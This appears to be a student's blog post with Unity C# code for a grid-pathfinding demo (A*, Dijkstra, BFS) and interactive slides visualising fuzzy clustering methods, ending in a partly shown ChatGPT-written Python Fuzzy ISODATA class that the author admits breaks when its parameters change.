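            case 1: // Dijkstra: order purely by accumulated cost from the start
                return node.gCost;
            case 2: // BFS: uniform step cost, i.e. order by hop count from the start
                return node.hopCount;
            default: // A*: f = g + h, with a distance heuristic toward the goal
                return node.gCost + CalculateDistanceCost(node, endNode);
        }
    }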

(Image)

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using CodeMonkey.Utils;
    using CodeMonkey;
    using UnityEngine.UI;

    public class Testing : MonoBehaviour {
[SerializeField] private PathfindingDebugStepVisual pathfindingDebugStepVisual; // step-by-step visualization of the algorithm
[SerializeField] private PathfindingVisual pathfindingVisual; // renders the grid
[SerializeField] private CharacterPathfindingMovementHandler characterPathfinding; // moves the character along the path

    [SerializeField] private Sprite King;
    [SerializeField] private Sprite Rook;
    [SerializeField] private Text mode;
    private Pathfinding pathfinding;
    [SerializeField] private List<GameObject> scenes;
    [SerializeField] private Text sceneIndex;
    private int currentScene = 0;

    private void Start() {
    pathfinding = new Pathfinding(8, 8, true);
    pathfindingDebugStepVisual.Setup(pathfinding.GetGrid());
    pathfindingVisual.SetGrid(pathfinding.GetGrid());
    }

    private void Update() {
    if (Input.GetMouseButtonDown(0)) {
Vector3 mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    List<PathNode> path = pathfinding.FindPath(0, 0, x, y);
    if (path != null) {
    for (int i=0; i<path.Count - 1; i++) {
    Debug.DrawLine(new Vector3(path[i].x, path[i].y) * 10f + Vector3.one * 5f, new Vector3(path[i+1].x, path[i+1].y) * 10f + Vector3.one * 5f, Color.green, 5f);
    }
    }
    characterPathfinding.SetTargetPosition(mouseWorldPosition);
    }

    if (Input.GetMouseButtonDown(1)) {
Vector3 mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    if(x >= 0 && y >= 0 && x < 8 && y < 8)
    pathfinding.GetNode(x, y).SetIsWalkable(!pathfinding.GetNode(x, y).isWalkable);
    }

    if(Input.GetKeyDown(KeyCode.Z))
    {
    pathfinding._8directions = !pathfinding._8directions;
    characterPathfinding.transform.Find("Chessman").GetComponent<SpriteRenderer>().sprite = pathfinding._8directions ? King : Rook;
    }
    if(Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.A))
    {
    privousScene();
    }
    if (Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.D))
    {
    nextScene();
    }
    }
    public void changeMode()
    {
    if(pathfinding.mode == 1)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "Dijkstra";
    }
    if (pathfinding.mode == 2)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "BFS";
    }
    if (pathfinding.mode == 3)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "A*";
    }
    pathfinding.mode = pathfinding.mode % 3 + 1;
    }

    public void privousScene()
    {
    if (currentScene == 0)
    currentScene = scenes.Count - 1;
    else
    currentScene -= 1;
    sceneIndex.text = (currentScene + 1) + "/" + scenes.Count;
    for (int i = 0; i < scenes.Count; i++)
    {
    scenes[i].SetActive(i == currentScene);
    }
    }
    public void nextScene()
    {
    currentScene = (currentScene + 1) % scenes.Count;
    sceneIndex.text = (currentScene + 1) + "/" + scenes.Count;
    for (int i = 0; i < scenes.Count; i++)
    {
    scenes[i].SetActive(i == currentScene);
    }
    }
    }

Grid system

The grid system and the pathfinding itself were adapted from Grid System in Unity (How to make it and where to use it) - YouTube.

(Images: slides 1-7)

Fuzzy Cluster Analysis

Lao Tian didn't feel like lecturing and had us present instead, so I went up to get some practice.

ChatGPT already existed by then, and it really did boost productivity, but the material was so complex that this still took two full days orz.

Scene logic

Same scene-switching logic as before: a single Scene, with one Prefab per slide.

The mouse cursor was customized.

Scene transitions are animated with DOTween, though my approach was a bit unorthodox; I'll learn it properly when I have time!

    using DG.Tweening;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class SceneController : MonoBehaviour
    {
    [SerializeField] private Text indexText;
    [SerializeField] private GameObject scenes;
    private int index = 0;
    private int index_old = 1;

    private GameObject oldScene;
    private GameObject newScene;
    private float timer = 0f;
    private bool changing = false;
    private bool isLeft = false;

    public Texture2D cursorTexture;

    public void OnLeftButton()
    {
    if (changing) return;
    index--;
    if (index == 0)
    {
    index = 7;
    }
    UpdateScene();
    }
    public void OnRightButton()
    {
    if (changing) return;
    index++;
    if (index == 8)
    {
    index = 1;
    }
    UpdateScene();
    }
    private void UpdateScene()
    {
    indexText.text = index + "/7";
    for (int i = 0; i < 7; i++)
    {
    Debug.Log(scenes.transform.GetChild(i).name + "," + index.ToString());
    if (scenes.transform.GetChild(i).name == index.ToString())
    {
    newScene = scenes.transform.GetChild(i).gameObject;
    }
    else if (scenes.transform.GetChild(i).name == index_old.ToString())
    {
    oldScene = scenes.transform.GetChild(i).gameObject;
    }
    else
    {
    scenes.transform.GetChild(i).gameObject.SetActive(false);
    }
    }
    if (index_old < index)
    {
    isLeft = true;
    newScene.transform.GetComponent<RectTransform>().anchoredPosition = new Vector3(1000, 0, 0);
    }
    else
    {
    isLeft = false;
    newScene.transform.GetComponent<RectTransform>().anchoredPosition = new Vector3(-1000, 0, 0);
    }
    newScene.SetActive(true);
    index_old = index;
    timer = 2f;
    }
    // Start is called before the first frame update
    void Start()
    {
    Cursor.SetCursor(cursorTexture, Vector2.zero, CursorMode.Auto);
    index = 1;
    indexText.text = index + "/7";
    oldScene = scenes.transform.Find("1").gameObject;
    }

    // Update is called once per frame
    void Update()
    {
    if (timer > 0)
    {
    timer -= Time.deltaTime;
// NOTE: restarting these tweens every frame while the timer runs is wasteful;
// a single tween kicked off in UpdateScene() would be cleaner.
if (isLeft) {
oldScene.transform.DOLocalMove(new Vector2(-1000, 0), 2f);
} else {
oldScene.transform.DOLocalMove(new Vector2(1000, 0), 2f);
}
    newScene.transform.DOLocalMove(new Vector2(0, 0), 2f);
    }
    }
    }

(Images: slides 1-2)

Clustering based on a fuzzy equivalence relation

A code reproduction plus a front end: dragging the Slider changes the value of λ, which recomputes the classification.
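
A note of my own (not from the slides) on what the code below computes: the λ-cut replaces every entry of the fuzzy equivalence matrix R with a crisp 0/1 value,

$$(R_\lambda)_{ij} = \begin{cases} 1, & r_{ij} \ge \lambda \\ 0, & r_{ij} < \lambda \end{cases}$$

Because R is a fuzzy equivalence relation, identical rows of $R_\lambda$ mark elements of the same class, which is exactly what the duplicate-row dictionary in OnSliderValueChanged() detects.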

    using Newtonsoft.Json.Linq;
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene2Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Text subText;
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private Color colorSmaller;
    [SerializeField] private Color colorBigger;
    private double[,] R = new double[5, 5]{
    {1, 0.48, 0.62, 0.41, 0.47},
    {0.48, 1, 0.48, 0.41, 0.47},
    {0.62, 0.48, 1, 0.41, 0.47},
    {0.41, 0.41, 0.41, 1, 0.41},
    {0.47, 0.47, 0.47, 0.41, 1}
    };
    private int[,] R_lambda = new int[5, 5]{
    {1, 0, 0, 0, 0},
    {0, 1, 0, 0, 0},
    {0, 0, 1, 0, 0},
    {0, 0, 0, 1, 0},
    {0, 0, 0, 0, 1}
    };
    private double lambda;

    [SerializeField] private Text AnsText;
    Dictionary<string, List<int>> duplicateRows = new Dictionary<string, List<int>>();
    string rowString = "";
    string str = "";
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 25; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 5, i % 5].ToString();
    }
    OnSliderValueChanged();
    }

    // Update is called once per frame
    void Update()
    {

    }
    public void OnSliderValueChanged()
    {
// update the matrices for the new λ
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda.ToString();
    subText.text = lambda.ToString();
    for (int i = 0; i < 25; i++)
    {
    if (R[i / 5, i % 5] < lambda)
    {
    R_lambda[i / 5, i % 5] = 0;
    Matrix1.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    }
    else
    {
    R_lambda[i / 5, i % 5] = 1;
    Matrix1.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    }
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_lambda[i / 5, i % 5].ToString();
    }
// build and output the classification result
    duplicateRows = new Dictionary<string, List<int>>();
    for (int i = 0; i < R_lambda.GetLength(0); i++)
    {
    rowString = "";
    for (int j = 0; j < R_lambda.GetLength(1); j++)
    {
    rowString += R_lambda[i, j].ToString() + ",";
    }
    if (duplicateRows.ContainsKey(rowString))
    {
    duplicateRows[rowString].Add(i);
    }
    else
    {
    duplicateRows.Add(rowString, new List<int> { i });
    }
    }

    str = "此时分成 " + duplicateRows.Count + " 类:";

    foreach (KeyValuePair<string, List<int>> kvp in duplicateRows)
    {
    str += "{";
    foreach (int row in kvp.Value)
    {
    str += "x" + (row + 1).ToString() + ",";
    }
    str = str.Remove(str.Length - 1);
    str += "}";
    }

    AnsText.text = str;
    }
    }

(Image: slide 3)

Classification via cut matrices of a fuzzy similarity relation

FuzzyMatrixMultiplication() was cribbed from ChatGPT.

Clicking the stones changes the value of k.
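
As far as I can tell (my summary, so treat it as a sketch), the function computes powers of R under the max-min composition:

$$(R^{k})_{ij} = \max_{m}\,\min\big((R^{k-1})_{im},\, r_{mj}\big), \qquad R^{1} = R.$$

For an $n \times n$ similarity matrix the powers stabilize at the transitive closure $t(R)$ after at most $n$ compositions, so stepping k through 1, 2, 4, 8 here (n = 5) is already enough to reach it.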

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene3Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Text subText;
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private GameObject Matrix3;
    [SerializeField] private Color colorSmaller;
    [SerializeField] private Color colorBigger;
    private double[,] R = new double[5, 5]{
    {1, 0.8, 0, 0.1, 0.2},
    {0.8, 1, 0.4, 0, 0.9},
    {0, 0.4, 1, 0, 0},
    {0.1, 0, 0, 1, 0.5},
    {0.2, 0.9, 0, 0.5, 1}
    };
    private double[,] R_k = new double[5, 5]{
    {1, 0.8, 0, 0.1, 0.2},
    {0.8, 1, 0.4, 0, 0.9},
    {0, 0.4, 1, 0, 0},
    {0.1, 0, 0, 1, 0.5},
    {0.2, 0.9, 0, 0.5, 1}
    };
    private int[,] R_lambda = new int[5, 5]{
    {1, 0, 0, 0, 0},
    {0, 1, 0, 0, 0},
    {0, 0, 1, 0, 0},
    {0, 0, 0, 1, 0},
    {0, 0, 0, 0, 1}
    };
    private double lambda;

    private int k = 1;
    [SerializeField] private Text kText;
    [SerializeField] private GameObject Stones;
    [SerializeField] private Text supText;
    [SerializeField] private Text supText2;

    [SerializeField] private Text AnsText;
    Dictionary<string, List<int>> duplicateRows = new Dictionary<string, List<int>>();
    string rowString = "";
    string str = "";
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 25; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 5, i % 5].ToString();
    }
    OnChangeK();
    }

    // Update is called once per frame
    void Update()
    {

    }
    public void OnChangeK()
    {
    k *= 2;
    if (k == 16) { k = 1; }
    kText.text = "k=" + k;
    supText.text = supText2.text = k.ToString();
    for (int i = 1; i < 5; i++)
    {
    if (Math.Pow(2, i - 1)<=k)
    Stones.transform.Find("Stone" + (i).ToString()).GetComponent<Image>().color= Color.yellow;
    else
    Stones.transform.Find("Stone" + (i).ToString()).GetComponent<Image>().color = Color.white;
    }
    OnSliderValueChanged();
    }
    public double[,] FuzzyMatrixMultiplication(double[,] matrix, int k)
    {
double[,] result = (double[,])matrix.Clone(); // work on a copy of matrix
    for (int i = 2; i <= k; i++)
    {
    double[,] temp = new double[matrix.GetLength(0), matrix.GetLength(1)];
    for (int j = 0; j < matrix.GetLength(0); j++)
    {
    for (int l = 0; l < matrix.GetLength(1); l++)
    {
    double temp2 = 0;
    for (int m = 0; m < matrix.GetLength(1); m++)
    {
    double fuzzyValue = Math.Min(result[j, m], matrix[m, l]);
    temp2 = Math.Max(fuzzyValue, temp2);
    }
    temp[j, l] = temp2;
    }
    }
result = (double[,])temp.Clone(); // copy temp back into result
    }
    return result;
    }
    public void OnSliderValueChanged()
    {
// update the matrices for the new λ
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda.ToString();
    subText.text = lambda.ToString();
    for (int i = 0; i < 25; i++)
    {
    if (R_k[i / 5, i % 5] < lambda)
    {
    R_lambda[i / 5, i % 5] = 0;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    Matrix3.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    }
    else
    {
    R_lambda[i / 5, i % 5] = 1;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    Matrix3.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    }
    Matrix3.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_lambda[i / 5, i % 5].ToString();
    }

    R_k = FuzzyMatrixMultiplication(R, k);
    for (int i = 0; i < 25; i++)
    {
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_k[i / 5, i % 5].ToString();
    }

// build and output the classification result
    duplicateRows = new Dictionary<string, List<int>>();
    for (int i = 0; i < R_lambda.GetLength(0); i++)
    {
    rowString = "";
    for (int j = 0; j < R_lambda.GetLength(1); j++)
    {
    rowString += R_lambda[i, j].ToString() + ",";
    }
    if (duplicateRows.ContainsKey(rowString))
    {
    duplicateRows[rowString].Add(i);
    }
    else
    {
    duplicateRows.Add(rowString, new List<int> { i });
    }
    }

    str = "此时分成 " + duplicateRows.Count + " 类:";

    foreach (KeyValuePair<string, List<int>> kvp in duplicateRows)
    {
    str += "{";
    foreach (int row in kvp.Value)
    {
    str += "x" + (row + 1).ToString() + ",";
    }
    str = str.Remove(str.Length - 1);
    str += "}";
    }

    AnsText.text = str;
    }
    }

(Image: slide 4)

Using the fuzzy similarity relation directly for classification

This part doesn't reproduce the algorithm; it programs straight toward the known result.

As before, dragging the Slider changes the value of λ.

Pressing the little pencil draws the maximal tree. Each edge GameObject's name encodes its weight, which UpdateUI() below parses with Split(' ')[1]; an edge stays visible only while its weight is at least both μ and λ.

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Numerics;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scece4Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Color matrixColor;
    [SerializeField] private GameObject Edges;
    private double mu = 1;
    private double lambda;
    private double[,] R = new double[8, 8]{
    {1, 0, 0, 0, 0.5, 0, 0.4, 0},
    {0, 1, 0, 0.8, 0, 0.8, 0.2, 0.5},
    {0, 0, 1, 0, 0.2, 0, 0.2, 0.2},
    {0, 0.8, 0, 1, 0, 0.4, 0, 0 },
    {0.5, 0, 0.2, 0, 1, 0, 0.8, 0 },
    {0, 0.8, 0,0.4, 0,1,0,0.8 },
    {0.4, 0.2, 0.2, 0, 0.8,0,1,0 },
    {0,0.5,0.2,0,0,0.8,0,1 }
    };
    [SerializeField] private GameObject Matrix;
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 64; i++)
    {
    Matrix.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 8, i % 8].ToString();
    if(i / 8 >= i % 8)
    {
    Matrix.transform.Find((i + 1).ToString()).GetComponent<Image>().color = matrixColor;
    }
    }
    OnSliderValueChanged();
    }
    public void OnDrawButton()
    {
    if (mu == 1)
    mu = 0.8;
    else if (mu == 0.8)
    mu = 0.5;
    else if (mu == 0.5)
    mu = 0.4;
    else if (mu == 0.4)
    mu = 0.2;
    else
    mu = 1;
    UpdateUI();
    }
    public void OnSliderValueChanged()
    {
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda;
    UpdateUI();
    }
    void UpdateUI()
    {
    for (int i = 0; i < Edges.transform.childCount; i++)
    {
    double temp = double.Parse(Edges.transform.GetChild(i).name.Split(' ')[1]);
    if (temp >= mu && temp >= lambda)
    {
    Edges.transform.GetChild(i).gameObject.SetActive(true);
    }
    else
    Edges.transform.GetChild(i).gameObject.SetActive(false);
    }
    }
    // Update is called once per frame
    void Update()
    {

    }
    }

(Image: slide 5)

Fuzzy K-Means

Press the buttons to change the value of L.

I remember puzzling over the front end here for ages, because I couldn't think of a good way to convert between game-space coordinates and chart coordinates.

In the end I settled on a rather crude method and never used DOTween for it.
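
For the record, what Calc() below iterates looks to me like the standard fuzzy c-means updates with fuzzifier m = 2 and two clusters:

$$Z_i = \frac{\sum_{k=1}^{4} u_{ik}^{2}\, x_k}{\sum_{k=1}^{4} u_{ik}^{2}}, \qquad u_{ik} = \frac{1}{\sum_{j=1}^{2} \left( d_{ik}/d_{jk} \right)^{2}},$$

where $d_{ik}$ is the Euclidean distance from sample $x_k$ to center $Z_i$. The code carries squared distances d1 and d2, so its update temp[0, k] = 1 / (1 + d1 / d2) is the same formula with the square already applied.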

    using DG.Tweening;
    using Newtonsoft.Json.Linq;
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Threading;
    using UnityEngine;
    using UnityEngine.UI;
    using static UnityEngine.UI.Image;

    public class Scene5Controller : MonoBehaviour
    {
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private GameObject Matrix3;
    [SerializeField] private Text LText;
    [SerializeField] private Text CondictionText;
    [SerializeField] private Color originColor;
    [SerializeField] private Color matrixColor;
    private int x = 0;
    private int y = 0;

    [SerializeField] private Text U_1_Text;
    [SerializeField] private Text U_Text;
    [SerializeField] private GameObject Z_1GameObject;
    [SerializeField] private GameObject Z_2GameObject;

    private Vector3 Z_1_old_position = Vector3.zero;
    private Vector3 Z_1_new_position = Vector3.zero;
    private Vector3 Z_2_old_position = Vector3.zero;
    private Vector3 Z_2_new_position = Vector3.zero;
    private float timer = 0;

    private int L = 0;
    private double[,] X = new double[4, 2]
    {
    {0, 0 },
    {0, 1 },
    {3, 1 },
    {3, 2 },
    };
    private double[] Z_1 = new double[] { 1.84, 1.84 };
    private double[] Z_2 = new double[] {2.84, 1.84};
    private double[,] U = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    private double[,] U_L_1 = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    private double[,] U_L = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    public void OnIncreseL()
    {
    L += 1;
    if(L == 7)
    {
    L = 1;
    }
    LText.text = "L=" + L;
    Calc();
    UpdateUI();
    }
    public void OnDecreseL()
    {
    L -= 1;
    if (L == 0)
    {
    L = 6;
    }
    LText.text = "L=" + L;
    Calc();
    UpdateUI();
    }
    public void Calc()
    {
    double[,] temp = new double[U.GetLength(0), U.GetLength(1)];
    for (int i = 0; i < U.GetLength(0); i++)
    {
    for (int j = 0; j < U.GetLength(1); j++)
    {
    temp[i, j] = U[i, j];
    }
    }
for (int i = 0; i < L; i++) // repeat L times
    {
    // Debug.Log("i=" + i +" ********************");
    for (int k = 0; k < 4; k++)
    {
    U_L_1[0, k] = temp[0, k];
    U_L_1[1, k] = temp[1, k];
    // Debug.Log(Math.Round(U_L_1[0, k], 2) + ", " + Math.Round(U_L_1[1, k], 2));
    }
////////////////// compute the cluster centers
double dividend_x_1 = 0; // numerator x (center 1)
double dividend_y_1 = 0; // numerator y (center 1)
double dvider_1 = 0; // denominator (center 1)

double dividend_x_2 = 0; // numerator x (center 2)
double dividend_y_2 = 0; // numerator y (center 2)
double dvider_2 = 0; // denominator (center 2)
for (int j = 0; j < 4; j++) // accumulate over the four samples
    {
    dvider_1 += temp[0, j] * temp[0, j];
    dividend_x_1 += X[j, 0] * temp[0, j] * temp[0, j];
    dividend_y_1 += X[j, 1] * temp[0, j] * temp[0, j];

    dvider_2 += temp[1, j] * temp[1, j];
    dividend_x_2 += X[j, 0] * temp[1, j] * temp[1, j];
    dividend_y_2 += X[j, 1] * temp[1, j] * temp[1, j];
    }
// update the cluster centers
    Z_1[0] = dividend_x_1 / dvider_1;
    Z_1[1] = dividend_y_1 / dvider_1;
    Z_2[0] = dividend_x_2 / dvider_2;
    Z_2[1] = dividend_y_2 / dvider_2;
    // Debug.Log("迭代次数 " + i + " 聚类中心:(" + Z_1[0] + "," + Z_1[1] + "),(" + Z_2[0] + "," + Z_2[1] + ")");
// compute squared distances and update the membership matrix
    double d1;
    double d2;
    for (int k = 0; k < 4; k++)
    {
    // Debug.Log("---------------------");
    // Debug.Log("X" + (k + 1) + ": " + X[k, 0] + ", " + X[k, 1]);
    d1 = (X[k, 0] - Z_1[0]) * (X[k, 0] - Z_1[0]) + (X[k, 1] - Z_1[1]) * (X[k, 1] - Z_1[1]);
    d2 = (X[k, 0] - Z_2[0]) * (X[k, 0] - Z_2[0]) + (X[k, 1] - Z_2[1]) * (X[k, 1] - Z_2[1]);
    temp[0, k] = 1 / (1 + d1 / d2);
    temp[1, k] = 1 / (1 + d2 / d1);
    // Debug.Log(Math.Round(temp[0, k], 2) + ", " + Math.Round(temp[1, k], 2));
    }
    }
    // Debug.Log("!!!!!!!!!!!!!!!!");
    for (int k = 0; k < 4; k++)
    {
    U_L[0, k] = temp[0, k];
    U_L[1, k] = temp[1, k];
    // Debug.Log(Math.Round(U_L[0, k], 2) + ", " + Math.Round(U_L[1, k], 2));
    }
    }
    public void UpdateUI()
    {
    Matrix2.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = originColor;
    Matrix3.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = originColor;
    U_1_Text.text = "U(" + (L - 1).ToString() + ")=";
    U_Text.text = "U(" + L + ")=";

    for (int i = 0; i < 4; i++)
    {
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L_1[0, i], 2).ToString();
    Matrix2.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L_1[1, i], 2).ToString();
    Matrix3.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L[0, i], 2).ToString();
    Matrix3.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L[1, i], 2).ToString();
    }
    double max = 0;

    for (int i = 0; i < U.GetLength(0); i++)
    {
    for (int j = 0; j < U.GetLength(1); j++)
    {
    if (max < Math.Abs(U_L_1[i, j] - U_L[i, j]))
    {
    max = Math.Abs(U_L_1[i, j] - U_L[i, j]);
    x = i;
    y = j;
    }
    }
    }
    CondictionText.text = Math.Round(max, 6).ToString();

    Matrix2.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = matrixColor;
    Matrix3.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = matrixColor;

    Z_1_old_position = Z_1GameObject.transform.localPosition;
    Z_2_old_position = Z_2GameObject.transform.localPosition;

    Z_1GameObject.transform.Find("Text").GetComponent<Text>().text = "Z1=(" + Math.Round(Z_1[0], 2) + ", " + Math.Round(Z_1[1],2) + ")T";
    Z_1_new_position = new Vector3((float)(120 * Math.Round(Z_1[0], 2)), (float)(120 * Math.Round(Z_1[1], 2)), 0);
    // Z_1GameObject.transform.localPosition = Z_1_new_position;

    Z_2GameObject.transform.Find("Text").GetComponent<Text>().text = "Z2=(" + Math.Round(Z_2[0], 2) + ", " + Math.Round(Z_2[1],2) + ")T";
    Z_2_new_position = new Vector3((float)(120 * Math.Round(Z_2[0], 2)), (float)(120 * Math.Round(Z_2[1], 2)), 0);
    // Z_2GameObject.transform.localPosition = Z_2_new_position;
    timer = 0.5f;


    }
    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < 4; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U[0, i], 2).ToString();
    Matrix1.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U[1, i], 2).ToString();
    }
    L = 0;
    Z_1_old_position = Z_1GameObject.transform.localPosition;
    Z_2_old_position = Z_2GameObject.transform.localPosition;
    OnIncreseL();
    }

    // Update is called once per frame
    void Update()
    {
    if (timer > 0)
    {
    timer -= Time.deltaTime;
    Z_1GameObject.transform.localPosition = Z_1_old_position + (Z_1_new_position - Z_1_old_position) * (1 - timer) * (1 - timer);
    Z_2GameObject.transform.localPosition = Z_2_old_position + (Z_2_new_position - Z_2_old_position) * (1 - timer) * (1 - timer);
    }
    }
    }

(Image: slide 6)

Fuzzy ISODATA

This part is computationally heavy and fairly involved; I never really understood it, let alone managed to visualize it……

ChatGPT helped me write a Python version. It does run in a Jupyter Notebook, but it breaks as soon as you tweak the parameters; luckily Lao Tian probably didn't understand it either, so I muddled through, hehe.

I reused the earlier scrolling code box for it.

    <color="#FF8800">import numpy as np
    </color>

    <color="#00FFFF">class FuzzyISODATA</color>():
    <color="#dcdcaa">def __init__(self, data, k, max_iter, min_samples=1, max_samples=None)</color>:
    self.data = data <color="#57a64a"># 输入的样本数据</color>
    self.k = k <color="#57a64a"># 簇的数量</color>
    self.max_iter = max_iter <color="#57a64a"># 最大迭代次数</color>
    self.min_samples = min_samples <color="#57a64a"># 每个簇的最小样本数</color>
    <color="#57a64a"># 每个簇的最大样本数 max_samples。如果未指定,则默认为样本数据 data 的长度</color>
    self.max_samples = max_samples if max_samples is not None else len(data)
    self.epsilon = 0.01 <color="#57a64a"># 容差阈值</color>
    self.alpha = 0.5 <color="#57a64a"># 簇重心标准偏差的阈值</color>
    self.beta = 0.5 <color="#57a64a"># 样本点从属度的阈值</color>

    self.centroids = None <color="#57a64a"># 簇质心</color>
    self.weights = None <color="#57a64a"># 每个样本点在所有簇中的从属度</color>

    <color="#dcdcaa">def initialize(self)</color>:
    <color="#57a64a"># 从原始数据 self.data 中选取 k 个随机的质心点,保存到 self.centroids 变量中。</color>
    self.centroids = self.data[np.random.choice(len(self.data), self.k, replace=False), :]
    <color="#57a64a"># 初始化权重矩阵 self.weights,大小为 (len(self.data), k),其中每个元素都被初始化为 0</color>
    self.weights = np.zeros((len(self.data), self.k))
    <color="#57a64a"># 对于所有原始数据 self.data 中的向量,为它们随机分配一个初始的权重值</color>
    for i in range(len(self.data)):
    self.weights[i, np.random.randint(self.k)] = 1

    <color="#dcdcaa">def update_weights(self)</color>:
    <color="#57a64a"># 代码通过遍历所有的质心点 j,找到所有分配到第 j 个簇中的数据样本</color>
    for j in range(self.k):
    <color="#57a64a"># 如果该簇中的样本数小于预设的最小值 self.min_samples,</color>
    <color="#57a64a"># 那么就认为该簇没有足够的样本,后面就无法对它进行合并等操作,因此需要把该簇从质心和权重矩阵中删除,并把 self.k 减 1</color>
    samples = self.data[self.weights[:, j] > 0]
    if len(samples) < self.min_samples:
    mask = self.weights[:, j] == 1
    self.weights[mask, :] = np.delete(self.weights[mask, :], j, axis=1)
    self.centroids = np.delete(self.centroids, j, axis=0)
    self.k -= 1
    continue
    <color="#57a64a"># 对于有足够样本的簇,算法会根据该簇中所有样本与该簇的质心点 j 之间的距离计算出一个标准差 std_dev,</color>
    <color="#57a64a"># 并将除标准差以外的部分规范化为一个权重值,用于表示该样本属于该簇的程度</color>
    <color="#57a64a"># 首先计算所有样本到 j 号质心的欧几里得距离 dist</color>
    dist = np.linalg.norm(samples - self.centroids[j], axis=1)
    <color="#57a64a"># 求出这些距离的平均值 mean_dist 和标准差 std_dev</color>
    mean_dist = np.mean(dist)
    <color="#57a64a"># 利用高斯分布函数将距离 dist 转换为一个 0~1 之间的权重值,用于表示该样本属于这个簇的程度</color>
    std_dev = np.sqrt(np.mean((dist - mean_dist) ** 2))

    mask = self.weights[:, j] > 0
    <color="#57a64a"># 根据计算出来的权重更新 self.weights 矩阵中的对应位置,即将 self.weights[i, j] 赋值为上面计算出来的权重值</color>
    self.weights[mask, j] = np.exp(-((dist - mean_dist) ** 2) / (2 * std_dev ** 2))

    <color="#dcdcaa">def update_centroids(self)</color>:
    <color="#57a64a"># 遍历所有质心点 j,并根据每个簇的权重信息,重新计算第 j 个簇的质心坐标</color>
    for j in range(self.k):
    <color="#57a64a"># 通过对 self.weights 矩阵进行逻辑判断,</color>
    <color="#57a64a"># 筛选出所有满足 self.weights[:, j] > 0 条件的索引,即所有已经被分配到第 j 个簇的数据样本</color>
    mask = self.weights[:, j] > 0
    <color="#57a64a"># 使用 np.mean() 方法在这些样本上分别计算出每个维度上的均值,作为该簇新的质心坐标</color>
    self.centroids[j] = np.mean(self.data[mask], axis=0)

    <color="#dcdcaa">def update_k(self)</color>:
    <color="#57a64a"># 判断样本数据量是否超过了 self.max_samples,如果没有超过就直接返回,不做任何处理</color>
